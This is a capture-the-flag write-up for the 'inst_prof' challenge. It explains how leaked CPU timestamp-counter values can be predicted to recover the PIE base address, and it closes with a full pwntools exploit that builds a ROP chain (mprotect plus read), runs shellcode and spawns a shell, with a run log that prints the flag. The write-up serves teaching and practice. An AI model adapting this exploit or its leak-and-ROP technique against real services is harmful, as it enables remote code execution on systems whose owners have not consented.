Summary of Exploitation:
• Leak CPU Time Stamp Counter (TSC)
• Predict TSC values
• Leak ELF base address using predicted TSC values
• Return into read_n function
• ROP payload of mprotect + read to execute shellcode
Analysis:
The provided binary is a 64-bit ELF with PIE and NX enabled. It behaves as follows:
• The main function sets up an alarm for 30 seconds and invokes the do_test function in an infinite loop. Each call to do_test performs the steps below
• Allocate a memory page using mmap with PROT_READ | PROT_WRITE permission
• Copy a template code which executes 4 NOPs in a loop 0x1000 times
• Replace NOP with 4 bytes of user supplied code
• Make the page PROT_READ | PROT_EXEC using mprotect
• Measure the TSC before execution of shellcode
• Execute the shellcode
• Measure the TSC after execution of shellcode
• Output the difference in TSC
• Free the page using munmap and execute the loop again
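Since each loop iteration accepts exactly 4 bytes of code, shorter instructions have to be padded, which is why the payloads later in this writeup append a nop to the 3-byte xor r12, r12. Below is a minimal sketch of that padding with hand-assembled encodings. The helper name pad_to_slot and the constants are hypothetical, introduced only for illustration; they are not part of the challenge binary or of pwntools.

```python
# Hypothetical helper: fit one instruction into the 4-byte slot of the template.
NOP = b"\x90"
SLOT_SIZE = 4  # the template replaces 4 NOP bytes with user-supplied code

def pad_to_slot(code):
    """Pad machine code with NOPs up to SLOT_SIZE bytes; reject anything longer."""
    if len(code) > SLOT_SIZE:
        raise ValueError("instruction does not fit into the %d-byte slot" % SLOT_SIZE)
    return code + NOP * (SLOT_SIZE - len(code))

# Hand-assembled x86-64 encodings of two instructions used in this writeup.
XOR_R12_R12 = bytes.fromhex("4d31e4")          # xor r12, r12 (3 bytes)
MOV_R12_RBP_M2D = bytes.fromhex("4c8b65d3")    # mov r12, [rbp-0x2d] (4 bytes)

print(pad_to_slot(XOR_R12_R12).hex())
print(pad_to_slot(MOV_R12_RBP_M2D).hex())
```

Anything longer than 4 bytes has to be split across several loop iterations, which is the approach taken for the mov-based stack writes later on.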
Leaking CPU Time Stamp Counter (TSC):
    .text:0000000000000B08    rdtsc                   ; get Time Stamp Counter
    .text:0000000000000B0A    shl     rdx, 20h
    .text:0000000000000B0E    mov     r12, rax
    .text:0000000000000B11    xor     eax, eax
    .text:0000000000000B13    or      r12, rdx        ; load TSC values in RDX & RAX to R12
    .text:0000000000000B16    call    rbx             ; execute the shellcode
    .text:0000000000000B18    rdtsc                   ; get Time Stamp Counter
    .text:0000000000000B1A    mov     edi, 1
    .text:0000000000000B1F    shl     rdx, 20h
    .text:0000000000000B23    lea     rsi, [rbp+buf]
    .text:0000000000000B27    or      rdx, rax
    .text:0000000000000B2A    sub     rdx, r12        ; Find the difference in TSC
    .text:0000000000000B2D    mov     [rbp+buf], rdx
    .text:0000000000000B31    mov     edx, 8
    .text:0000000000000B36    call    _write          ; Output the result

The TSC value is stored in R12 before the shellcode executes and is later used to compute the difference:

    .text:0000000000000B2A    sub     rdx, r12

If the 4-byte user-supplied code is xor r12, r12, the subtraction has no effect, so the program outputs the entire RDX value (i.e. the raw TSC) and goes into the next loop.
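The effect of the injected code on the reported value can be modelled in a few lines. This is only a sketch of the arithmetic performed by sub rdx, r12 on 64-bit registers; the function name reported_value and the concrete TSC and pointer values are assumptions chosen for illustration.

```python
MASK64 = (1 << 64) - 1

def reported_value(tsc_after, r12):
    """Model of 'sub rdx, r12': the 8 bytes the program writes back."""
    return (tsc_after - r12) & MASK64

# Hypothetical counter values for one loop iteration.
tsc_before = 0x244baebdaa000
tsc_after = 0x244baebdaa75f

# Shellcode of plain NOPs: R12 still holds tsc_before, so only the delta leaks.
print(hex(reported_value(tsc_after, tsc_before)))

# Shellcode 'xor r12, r12': R12 is zero, so the raw TSC leaks.
print(hex(reported_value(tsc_after, 0)))

# Shellcode 'mov r12, [rbp-offset]': the output is TSC minus the loaded value,
# and it wraps modulo 2**64 whenever the loaded value exceeds the TSC.
pointer = 0x0000555555554b18
out = reported_value(tsc_after, pointer)
print(hex((tsc_after - out) & MASK64))  # recovers the pointer if the TSC is known
```

The last case is what the rest of the exploit builds on: whoever knows the TSC at the second rdtsc can recover whatever was loaded into R12.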
Idea to leak pointers:
Load register R12 with a pointer fetched from the stack using mov r12, [rbp-offset]. The program now outputs (TSC - pointer loaded into R12). The problem is that both the TSC and the pointer in R12 are unknown values. However, we know the TSC values leaked during previous executions of the loop, so we can try to predict the current TSC value from them.
The TSC behaves as follows, which dictates how the payload must be sent:
• The initial executions of do_test take more CPU cycles due to cache effects
• Executing do_test multiple times reduces the CPU cycles between loops and makes them more regular. This is cache warming
• Do not read or write data per loop. Send the whole payload at once and read the output only after everything has executed, so that nothing blocks between iterations
Consider the below code snippet:
    payload = b''
    for _ in range(16):
        payload += asm("xor r12, r12; nop")

    r.send(payload)
    tsc_values = r.recv(8 * 16)

    first_tsc = u64(tsc_values[0:8])
    prev_tsc = first_tsc
    print("[+] TSC = 0x%x" % (first_tsc))

    for i in range(1, 16):
        curr_tsc = u64(tsc_values[i*8:(i+1)*8])
        diff_tsc = curr_tsc - prev_tsc
        prev_tsc = curr_tsc
        print("[+] TSC = 0x%x, diff = 0x%x" % (curr_tsc, diff_tsc))
    $ python tsc_leak.py
    [+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
    [+] TSC = 0x244baebdaa75f
    [+] TSC = 0x244baebdc57b4, diff = 0x1b055
    [+] TSC = 0x244baebdcb015, diff = 0x5861
    [+] TSC = 0x244baebdcfdb8, diff = 0x4da3
    [+] TSC = 0x244baebdd47d8, diff = 0x4a20
    [+] TSC = 0x244baebdd9272, diff = 0x4a9a
    [+] TSC = 0x244baebdddd3b, diff = 0x4ac9
    [+] TSC = 0x244baebde2850, diff = 0x4b15
    [+] TSC = 0x244baebde7353, diff = 0x4b03
    [+] TSC = 0x244baebdebf1b, diff = 0x4bc8
    [+] TSC = 0x244baebdf0a4d, diff = 0x4b32
    [+] TSC = 0x244baebdf56d3, diff = 0x4c86
    [+] TSC = 0x244baebdfa1ec, diff = 0x4b19
    [+] TSC = 0x244baebdfecdc, diff = 0x4af0
    [+] TSC = 0x244baebe037b3, diff = 0x4ad7
    [+] TSC = 0x244baebe08c23, diff = 0x5470

After the first few executions, which take more CPU cycles, the differences come down and become regular, i.e. the next TSC value can be predicted with good accuracy, except for some of the least significant bits.
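To put a number on "some of the least significant bits", the sample output above can be fed through the same linear prediction the exploit uses later (next = previous + last difference). This is a rough sketch on this one sample only; the warm-up cutoff of 3 samples and the function name prediction_errors are assumptions.

```python
# TSC values copied from the sample run above.
samples = [
    0x244baebdaa75f, 0x244baebdc57b4, 0x244baebdcb015, 0x244baebdcfdb8,
    0x244baebdd47d8, 0x244baebdd9272, 0x244baebdddd3b, 0x244baebde2850,
    0x244baebde7353, 0x244baebdebf1b, 0x244baebdf0a4d, 0x244baebdf56d3,
    0x244baebdfa1ec, 0x244baebdfecdc, 0x244baebe037b3, 0x244baebe08c23,
]

WARMUP = 3  # assumption: skip the first iterations, which are dominated by cache misses

def prediction_errors(values):
    """Error of predicting values[i] as values[i-1] + (values[i-1] - values[i-2])."""
    errors = []
    for i in range(2, len(values)):
        predicted = values[i - 1] + (values[i - 1] - values[i - 2])
        errors.append(values[i] - predicted)
    return errors

errors = prediction_errors(samples[WARMUP:])
worst = max(abs(e) for e in errors)
print("worst error = 0x%x (%d bits)" % (worst, worst.bit_length()))
```

On this sample the worst steady-state error is 0x999 cycles, i.e. it fits in 12 bits, and the errors come with both signs. A single run proves nothing about the remote machine in general, but it suggests that anything placed well above the low bits of the subtraction can be recovered.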
Leaking ELF base address:
To leak the ELF base address, load the R12 register with the value at rbp-0x28. This holds a pointer to

    .text:0000000000000B18    rdtsc

The program now outputs (TSC - pointer loaded into R12). Substituting the predicted TSC value for the actual one, the pointer in R12 can be computed. The last few bits might be inaccurate. However, the last 12 bits of the pointer are known, as they are not randomized due to page alignment.
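A small simulation shows both why this works and where it becomes fragile. It is a sketch under assumptions: the pointer value is the one seen under gdb without ASLR, the TSC value and the two prediction errors are hypothetical, and recover_pointer is an illustrative name.

```python
MASK64 = (1 << 64) - 1
PAGE_MASK = 0xfff

def recover_pointer(predicted_tsc, output):
    """Invert output = (tsc - pointer) mod 2**64 using a predicted TSC."""
    return (predicted_tsc - output) & MASK64

true_pointer = 0x0000555555554b18   # points at .text:0B18 in the debugged process
true_base = true_pointer & ~PAGE_MASK
actual_tsc = 0x244baebdd47d8        # hypothetical TSC at the second rdtsc
output = (actual_tsc - true_pointer) & MASK64

# Small prediction error: the estimate stays within the same page.
estimate = recover_pointer(actual_tsc + 0x2f, output)
print(hex(estimate & ~PAGE_MASK))   # correct ELF page

# Larger prediction error: 0xb18 + 0x999 crosses a page boundary.
estimate = recover_pointer(actual_tsc + 0x999, output)
print(hex(estimate & ~PAGE_MASK))   # off by one page
```

Because the known page offset 0xb18 sits close to the end of the page, an error of a few thousand cycles is enough to land on the wrong page, so masking off the low 12 bits alone is not fully reliable.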
Can the least significant bits also be leaked reliably using this technique? Yes, by reading the pointer in two chunks. Instead of reading the whole pointer from rbp-0x28:

    gdb-peda$ x/gx $rbp-0x28
    0x7fffffffde48: 0x0000555555554b18

read it twice at unaligned offsets, so that each half of the pointer lands in the most significant bytes of the loaded value. Of the 8-byte address, the 2 most significant bytes are 0x00, which leaves 6 bytes to leak as two 3-byte chunks:

    gdb-peda$ x/gx $rbp-0x2a
    0x7fffffffde46: 0x555555554b180000
    gdb-peda$ x/gx $rbp-0x2d
    0x7fffffffde43: 0x554b180000000000

Since the most significant bytes of the TSC can be predicted reliably, unlike the least significant bytes, this results in a reliable info leak. The part of the exploit that implements this is given below.
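As an offline check of the byte arithmetic, separate from the exploit itself, the two unaligned reads can be reproduced with struct on a fake stack. The stack contents (zero bytes in front of the pointer, as in the gdb output), the TSC value, and the prediction error are assumptions; unaligned_read and recover_chunk are illustrative names.

```python
import struct

MASK64 = (1 << 64) - 1

def unaligned_read(stack, offset):
    """Little-endian 8-byte load, like 'mov r12, [rbp-offset]'."""
    return struct.unpack_from("<Q", stack, offset)[0]

def recover_chunk(predicted_tsc, output):
    """Top 24 bits of (predicted TSC - output), as computed in the exploit."""
    return ((predicted_tsc - output) & MASK64) >> 40

pointer = 0x0000555555554b18
stack = bytes(8) + struct.pack("<Q", pointer)    # fake stack: zeros, then the pointer
slot = 8                                         # offset standing in for rbp-0x28

low_view = unaligned_read(stack, slot - 5)       # like rbp-0x2d: low 3 bytes on top
high_view = unaligned_read(stack, slot - 2)      # like rbp-0x2a: high 3 bytes on top

tsc = 0x244baebdd47d8                            # hypothetical actual TSC
error = 0x999                                    # hypothetical prediction overshoot
chunk_lo = recover_chunk(tsc + error, (tsc - low_view) & MASK64)
chunk_hi = recover_chunk(tsc + error, (tsc - high_view) & MASK64)

leaked = (chunk_hi << 24) | chunk_lo
print(hex(low_view), hex(high_view), hex(leaked))
```

With the interesting bytes shifted 40 bits up, a prediction that overshoots by less than 2^40 cycles does not disturb the chunk. If the prediction undershoots instead, the subtraction borrows from the upper bits and the chunk comes out one too small; for the low chunk this would show up as a page offset of 0xb17 instead of the known 0xb18.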
    payload = b''
    for _ in range(16):
        payload += asm("xor r12, r12; nop")

    # try finding difference in execution time between do_loop to predict rdtsc output
    payload += asm("xor r12, r12; nop")
    payload += asm("xor r12, r12; nop")
    payload += asm("mov r12, [rbp-0x2d]")   # leak 3 lsb bytes, unaligned read

    payload += asm("xor r12, r12; nop")
    payload += asm("xor r12, r12; nop")
    payload += asm("mov r12, [rbp-0x2a]")   # leak 3 msb bytes, unaligned read

    print("[+] warming up cache for leaking pointers")
    r.send(payload)
    r.recv(16 * 8)

    # leaking pointers in two chunks to make up for less predictable LSB values of TSC
    t1 = u64(r.recv(8))   # leak lsb bytes
    t2 = u64(r.recv(8))
    diff = t2 - t1
    expected_value = t2 + diff
    t3 = u64(r.recv(8))
    print("[+] leaked TSC value = 0x%x" % (t1))
    pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
    print("[+] pointer_lsb = 0x%x" % (pointer_lsb))

    t1 = u64(r.recv(8))   # leak msb bytes
    t2 = u64(r.recv(8))
    diff = t2 - t1
    expected_value = t2 + diff
    t3 = u64(r.recv(8))
    pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
    print("[+] pointer_msb = 0x%x" % (pointer_msb))

    # .text:0000000000000B18 rdtsc
    pointer = (pointer_msb << 24) | pointer_lsb
    print("[+] leaked address = 0x%x" % (pointer))
    elf_base = pointer & 0xfffffffffffff000
    print("[+] ELF base address = 0x%x" % (elf_base))

Gaining RIP control using relative write w.r.t RBP:
Once the ELF base address is leaked, a small ROP payload is set up on the stack using a series of mov operations, in order to invoke the read_n function:

    # payload to return into read_n function
    payload = asm("mov r13, rsp; ret")
    payload += asm("mov r14, [r13]")          # .text:0000000000000B18 rdtsc
    payload += asm("mov r14b, 0xc3; ret")     # modify LSB to get pop rdi gadget
    payload += asm("mov r15, [rbp-0x48]")     # .text:0000000000000AA3 mov [rbx-1], al
    payload += asm("mov r15b, 0x80; ret")     # modify LSB to get read_n address
    payload += asm("mov [rbp+24], r15")       # return into read_n
    payload += asm("mov [rbp+16], r13")       # stack address as argument for read_n
    payload += asm("mov [rbp+8], r14")        # overwrite RIP with pop rdi; read_n(stack_address, 0x1000)
    r.send(payload)

RSI already holds the value 0x1000 due to the program state, hence the call becomes read_n(RSP, 0x1000). read_n reads a second ROP payload onto the stack, which is then executed to perform the below operations:
    mprotect(elf_base, 0x1000, 7)
    read(0, elf_base, 0x100)
    jmp elf_base
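The first-stage frame that the mov operations write relative to RBP relies on patching only the low byte of code pointers already present on the stack. The sketch below reproduces that address arithmetic. The ELF base is taken from the sample run, the offsets come from the comments in the exploit, and with_low_byte and the frame dictionary are hypothetical names used only to visualise the layout.

```python
def with_low_byte(address, low_byte):
    """Replace the least significant byte, like 'mov r14b, imm8'."""
    return (address & ~0xff) | low_byte

elf_base = 0x55636a173000                    # value leaked in the sample run

ret_after_call = elf_base + 0xb18            # return address of 'call rbx'
pop_rdi_ret = with_low_byte(ret_after_call, 0xc3)

code_ptr = elf_base + 0xaa3                  # code pointer found at rbp-0x48
read_n = with_low_byte(code_ptr, 0x80)

# Frame written by the mov instructions, keyed by offset from RBP.
frame = {
    8: pop_rdi_ret,          # saved RIP of do_test -> pop rdi; ret
    16: "stack address",     # popped into RDI (value of RSP saved in r13)
    24: read_n,              # next return target: read_n(RDI, RSI=0x1000)
}

for offset in sorted(frame):
    value = frame[offset]
    shown = hex(value) if isinstance(value, int) else value
    print("[rbp+%d] = %s" % (offset, shown))
```

Patching a single byte is sufficient here because both targets share their upper bytes with a pointer that is already on the stack, so this stage never needs a full 8-byte immediate, which would not fit into the 4-byte slots.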
    $ python solver.py
    [+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
    [+] warming up cache for leaking pointers
    [+] leaked TSC value = 0x30aba58d51eb8
    [+] pointer_lsb = 0x173b18
    [+] pointer_msb = 0x55636a
    [+] leaked address = 0x55636a173b18
    [+] ELF base address = 0x55636a173000
    [+] sending ROP payload
    [*] Switching to interactive mode
    $ id
    uid=1337(user) gid=1337(user) groups=1337(user)
    $ cat flag.txt
    CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}

Here is the full exploit:
    import sys
    from pwn import *

    host = 'inst-prof.ctfcompetition.com'
    port = 1337
    context.arch = 'amd64'

    if len(sys.argv) == 2:
        r = process('./inst_prof')
    else:
        r = remote(host, port)

    r.recvline()

    # warmup the cache for the leaking pointers
    payload = b''
    for _ in range(16):
        payload += asm("xor r12, r12; nop")

    # try finding difference in execution time between do_loop to predict rdtsc output
    payload += asm("xor r12, r12; nop")
    payload += asm("xor r12, r12; nop")
    payload += asm("mov r12, [rbp-0x2d]")   # leak 3 lsb bytes, unaligned read

    payload += asm("xor r12, r12; nop")
    payload += asm("xor r12, r12; nop")
    payload += asm("mov r12, [rbp-0x2a]")   # leak 3 msb bytes, unaligned read

    print("[+] warming up cache for leaking pointers")
    r.send(payload)
    r.recv(16 * 8)

    # leaking pointers in two chunks to make up for less predictable LSB values of TSC
    t1 = u64(r.recv(8))   # leak lsb bytes
    t2 = u64(r.recv(8))
    diff = t2 - t1
    expected_value = t2 + diff
    t3 = u64(r.recv(8))
    print("[+] leaked TSC value = 0x%x" % (t1))
    pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
    print("[+] pointer_lsb = 0x%x" % (pointer_lsb))

    t1 = u64(r.recv(8))   # leak msb bytes
    t2 = u64(r.recv(8))
    diff = t2 - t1
    expected_value = t2 + diff
    t3 = u64(r.recv(8))
    pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
    print("[+] pointer_msb = 0x%x" % (pointer_msb))

    # .text:0000000000000B18 rdtsc
    pointer = (pointer_msb << 24) | pointer_lsb
    print("[+] leaked address = 0x%x" % (pointer))
    elf_base = pointer & 0xfffffffffffff000
    print("[+] ELF base address = 0x%x" % (elf_base))

    # payload to return into read_n function
    payload = asm("mov r13, rsp; ret")
    payload += asm("mov r14, [r13]")          # .text:0000000000000B18 rdtsc
    payload += asm("mov r14b, 0xc3; ret")     # pop rdi; ret
    payload += asm("mov r15, [rbp-0x48]")     # .text:0000000000000AA3 mov [rbx-1], al
    payload += asm("mov r15b, 0x80; ret")     # read_n address
    payload += asm("mov [rbp+24], r15")       # return into read_n
    payload += asm("mov [rbp+16], r13")       # stack address
    payload += asm("mov [rbp+8], r14")        # overwrite RIP with pop rdi; read_n(stack_address, 0x1000)
    r.send(payload)
    r.recv(8 * 8)

    # send ROP payload using leaked ELF base address
    print("[+] sending ROP payload")
    payload = b"A" * 72
    payload += p64(elf_base + 0xbba)          # 0x00000bba: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
    payload += p64(0)
    payload += p64(1)
    payload += p64(elf_base + 0x0202028)      # GOT address of alarm as NOP for call QWORD PTR [r12+rbx*8]
    payload += p64(0x7)                       # rdx
    payload += p64(0x1000)                    # rsi
    payload += p64(0x4545454545454545)        # rdi
    payload += p64(elf_base + 0xba0)          # __libc_csu_init
    payload += b"F" * 8
    payload += p64(0)
    payload += p64(1)
    payload += p64(elf_base + 0x0202028)      # GOT address of alarm as NOP for call QWORD PTR [r12+rbx*8]
    payload += p64(0x100)                     # rdx, load registers for read
    payload += p64(elf_base)                  # rsi
    payload += p64(0)                         # rdi

    # make ELF header RWX
    payload += p64(elf_base + 0xbc3)          # pop rdi; ret
    payload += p64(elf_base)                  # rdi
    payload += p64(elf_base + 0x820)          # mprotect(elf_base, 0x1000, 7)

    # read into ELF header
    payload += p64(elf_base + 0xba0)          # __libc_csu_init
    payload += b"G" * 56
    payload += p64(elf_base + 0x7e0)          # read(0, elf_base, 0x100)

    # return to shellcode
    payload += p64(elf_base)
    payload += p64(0xdeadbeef00000000)
    payload += b"B" * (4096 - len(payload))
    r.send(payload)

    sc = asm(shellcraft.amd64.linux.syscall('SYS_alarm', 0))
    sc += asm(shellcraft.amd64.linux.sh())
    r.sendline(sc)

    r.interactive()